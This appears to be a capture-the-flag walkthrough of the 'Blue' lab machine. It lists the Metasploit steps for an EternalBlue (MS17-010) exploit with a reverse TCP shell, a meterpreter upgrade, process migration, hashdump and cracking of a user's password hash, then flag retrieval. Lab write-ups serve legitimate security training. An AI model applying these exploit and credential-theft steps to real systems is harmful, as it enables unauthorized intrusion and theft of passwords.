By: Nicholas Werner
Starting off with an nmap scan.
We see that the OS is running Windows 7 Professional 7601 Service Pack 1 so we search for an exploit and click on the Rapid7 link.
It appears that the exploit is eternal blue which makes sense by the name of the box (Blue).
Copy and paste the module from Rapid7 (use exploit/windows/smb/ms17_010_eternalblue). Options allows us to see what options are required.
Set RHOSTS to the victim machines IP address. Set payload to windows/x64/shell/reverse_tcp
Exploit allows us to run the exploit and it looks like we got a shell.
We want to get a meterpreter shell so we background this shell with Ctrl^z
search shell_to_meterpreter is a module that will allow us to escalate our shell into a meterpreter shell.
We need to set the session to our previous session and then exploit.
sessions allows us to view our sessions and now you can see that a meterpreter session was opened. sessions -i 2 allows us to go into that meterpreter session.
getuid shows us that we have SYSTEM but that doesn’t mean our process is.
ps shows us our processes with their process id.
We want to migrate our process to spoolsv.exe (migrate 1284).
hashdump allows us to see the hashes of the users on this machine.
Entering the hash of Jon into CrackStation will allow us to crack the hash and see his password.
shell allows us to get a windows shell so that it’s easier to navigate the file system. cd c:\ gets us to the c:\ directory.
dir allows us to see the contents of the directory and as we can see, flag1.txt is here so type flag1.txt allows us to see its contents.
After some searching we find the second flag in \Windows\System32\config
Type cd .. until you get back to c:\
We found the final flag in \Users\Jon\Documents